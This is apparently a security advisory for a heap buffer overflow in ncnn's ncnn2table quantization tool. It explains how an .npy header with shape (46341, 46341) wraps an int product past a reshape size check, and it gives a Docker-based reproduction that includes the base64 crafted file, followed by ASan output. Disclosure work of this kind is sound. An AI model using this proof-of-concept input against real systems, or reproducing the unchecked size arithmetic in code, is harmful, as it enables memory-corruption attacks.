Heap Buffer Overflow in NPY Calibration Input
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: tools/quantize/ncnn2table.cpp:421 in read_npy
Sanitizer verdict: heap-buffer-overflow
Summary
ncnn2table reads NPY calibration tensors straight into an ncnn::Mat that aliases the decoded std::vector<float>, and the element count is computed with plain int multiplication of the dimensions taken from the file header. A float32 .npy declaring shape=(46341, 46341) makes that product wrap past INT_MAX, the reshape() size guard compares two identically wrapped products and passes, and the resulting Mat claims a 16-byte-aligned cstep that is larger than the vector actually holds. Mat::clone() then memcpys 8589953136 bytes out of an 8589953124-byte heap allocation. The entry point is the ncnn2table quantization CLI run with type=1 (NPY calibration input), which reaches read_npy() from QuantNet::quantize_KL().
Detail
The untrusted field is the shape tuple in the NPY header of a file named by the calibration list. npy::read_npy() resizes its std::vector<float> to the product of those dimensions, and read_npy() in ncnn2table.cpp then validates only two things: that the number of header dimensions equals the number of dimensions in the shape= command-line argument, and that each header dimension equals the corresponding CLI value. Neither an upper bound nor an overflow check exists, so the dimensions propagate directly into the Mat construction below.
// tools/quantize/ncnn2table.cpp:416
switch (dims)
{
case 1:
return ncnn::Mat(shape[0], (void*)(d.data.data())).reshape(shape[0]).clone();
case 2:
return ncnn::Mat(shape[0] * shape[1], (void*)(d.data.data())).reshape(shape[0], shape[1]).clone();
46341 * 46341 is 2147488281, which does not fit in a signed 32-bit int; the product wraps to -2147479015, and ncnn::Mat(int w, void* data) is built over the vector with that negative width. Mat::reshape(int _w, int _h) guards with if (w * h * d * c != _w * _h) return Mat(); — but _w * _h wraps to exactly the same negative value, so the guard passes and reshape returns a 2-D view with w = h = 46341 and cstep = alignSize((size_t)46341 * 46341 * 4, 16) / 4, i.e. 2147488284 floats.
clone() allocates a fresh 2-D Mat and, because both cstep values agree, executes memcpy(m.data, data, total() * elemsize) at src/mat.cpp:93 with total() * elemsize == 8589953136. The source is the decoded vector, 2147488281 * 4 == 8589953124 bytes, so the copy reads 12 bytes past its end — the exact region and read size in the ASan report. The 12 bytes are the cstep alignment padding, which a Mat allocated by create() always owns but a Mat aliasing an external std::vector never does; any 2-D NPY whose w * h * 4 is not a multiple of 16 reaches the same overread, and the oversized dimensions simply make it trivially reachable while also wrapping the size check.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-npy-calibration-input && cd ncnn-poc-heap-buffer-overflow-in-npy-calibration-input
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > model.param <<'EOF'
7767517
2 2
Input data 0 1 data
Convolution conv 1 1 data out 0=1 1=1 6=1
EOF
base64 -d > model.bin <<'EOF'
AAAAAAAAgD8=
EOF
cat > images.list <<'EOF'
huge.npy
EOF
base64 -d > huge.npy <<'EOF'
k05VTVBZAQBGAHsnZGVzY3InOiAnPGY0JywgJ2ZvcnRyYW5fb3JkZXInOiBGYWxzZSwgJ3NoYXBl
JzogKDQ2MzQxLCA0NjM0MSksIH0gIAo=
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/quantize/ncnn2table model.param model.bin images.list out.table 'shape=[46341,46341]' type=1
AddressSanitizer output:
mean =
norm =
shape = [46341,46341]
pixel =
thread = 24
method = kl
---------------------------------------
count the absmax 0.00% [ 0 / 1 ]
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x786c21dff064 at pc 0x786c24ed142e bp 0x7ffd43f50a10 sp 0x7ffd43f501b8
READ of size 8589953136 at 0x786c21dff064 thread T0
#0 0x786c24ed142d in memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:115
#1 0x5ddd02c2812b in ncnn::Mat::clone(ncnn::Allocator*) const /ncnn/src/mat.cpp:93
#2 0x5ddd02b75131 in read_npy(std::vector<int, std::allocator<int> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/ncnn/build/tools/quantize/ncnn2table+0x2f7131) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
#3 0x5ddd02b3e3e2 in QuantNet::quantize_KL() /ncnn/tools/quantize/ncnn2table.cpp:834
#4 0x5ddd02b6b6b0 in main /ncnn/tools/quantize/ncnn2table.cpp:2229
#5 0x786c248591c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#6 0x786c2485928a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x5ddd02b23be4 in _start (/ncnn/build/tools/quantize/ncnn2table+0x2a5be4) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
0x786c21dff064 is located 0 bytes after 8589953124-byte region [0x786a21dfa800,0x786c21dff064)
allocated by thread T0 here:
#0 0x786c24ed4548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95
#1 0x5ddd02ba786b in std::__new_allocator<float>::allocate(unsigned long, void const*) (/ncnn/build/tools/quantize/ncnn2table+0x32986b) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
#2 0x5ddd02b94f1e in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) (/ncnn/build/tools/quantize/ncnn2table+0x316f1e) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
#3 0x5ddd02b88349 in std::vector<float, std::allocator<float> >::_M_default_append(unsigned long) (/ncnn/build/tools/quantize/ncnn2table+0x30a349) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
#4 0x5ddd02b7fb06 in std::vector<float, std::allocator<float> >::resize(unsigned long) (/ncnn/build/tools/quantize/ncnn2table+0x301b06) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
#5 0x5ddd02b89d25 in npy::npy_data<float> npy::read_npy<float>(std::istream&) (/ncnn/build/tools/quantize/ncnn2table+0x30bd25) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
#6 0x5ddd02b80140 in npy::npy_data<float> npy::read_npy<float>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/ncnn/build/tools/quantize/ncnn2table+0x302140) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
#7 0x5ddd02b737b2 in read_npy(std::vector<int, std::allocator<int> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) (/ncnn/build/tools/quantize/ncnn2table+0x2f57b2) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
#8 0x5ddd02b3e3e2 in QuantNet::quantize_KL() /ncnn/tools/quantize/ncnn2table.cpp:834
#9 0x5ddd02b6b6b0 in main /ncnn/tools/quantize/ncnn2table.cpp:2229
#10 0x786c248591c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x786c2485928a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x5ddd02b23be4 in _start (/ncnn/build/tools/quantize/ncnn2table+0x2a5be4) (BuildId: 545f9012937b0bda9fa22c45f4b018021cd96021)
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:115 in memcpy
Credit
Zheng Yu @ DepthFirst